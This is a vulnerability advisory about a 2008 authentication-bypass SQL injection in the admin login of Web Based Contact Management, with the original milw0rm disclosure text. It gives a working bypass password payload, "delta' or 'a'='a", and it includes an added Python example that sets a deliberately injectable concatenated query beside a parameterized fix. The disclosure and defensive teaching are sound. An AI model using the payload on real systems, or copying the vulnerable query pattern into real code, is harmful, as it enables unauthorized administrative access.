Vendor: Web Based Contact Management
By: b3hz4d
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Web Based Contact Management
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
2008

Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability

The admin login page of Web Based Contact Management is vulnerable to SQL injection. All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable. An attacker can bypass authentication by submitting the username "anything" and the password "delta' or 'a'='a".

Mitigation:

Input validation should be used to prevent SQL Injection attacks.
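
Added example, not code from the vendor or the advisory: a login check built by string concatenation next to a parameterized one, run against the credentials quoted above. The product's source is not shown on this page, so the table name, column names, query shape and sample account are assumptions constructed for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 100_000  # constructed work factor for the sample

def make_db():
    """Constructed in-memory stand-in for the admin account table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY,"
               " password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"S3cret!pass", salt, ITERATIONS)
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", "S3cret!pass", salt, pw_hash))
    return db

def login_vulnerable(db, username, password):
    # Assumed flaw: input is concatenated into the SQL text, so a quote in
    # the input closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # Input is bound as data; the statement text is constant.
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, pw_hash = row
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, pw_hash)

def compare(username, password):
    """Return (vulnerable_result, parameterized_result) for one login attempt."""
    db = make_db()
    return (login_vulnerable(db, username, password),
            login_parameterized(db, username, password))

if __name__ == "__main__":
    # Credentials quoted in the advisory, then a legitimate and a wrong login.
    for user, pw in [("anything", "delta' or 'a'='a"),
                     ("admin", "S3cret!pass"), ("admin", "wrong")]:
        print(user, repr(pw), compare(user, pw))
```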

Exploit-DB raw data:

        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                         +
        + Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability  +
        +                                                                         +
        +                        Discovered by b3hz4d                             +
        +                                                                         +
        +                        WwW.DeltaHacking.Net                             +
        +                                                                         +
        +                                                                         +
        +                                                                         +
        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 03 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR        : http://www.aliensoftcorp.com/
DEMO          : http://www.aliensoftcorp.com/contactmanager.htm

#####################################################


[+] vuln    : 
              
              Admin login page
              
              All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.
              
              All Demo links are here:
              
              http://www.aliensoftcorp.com/contactmanager.htm	  

[+] Exploit : 
              USER: anything

              PASS: delta' or 'a'='a

##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# milw0rm.com [2008-12-03]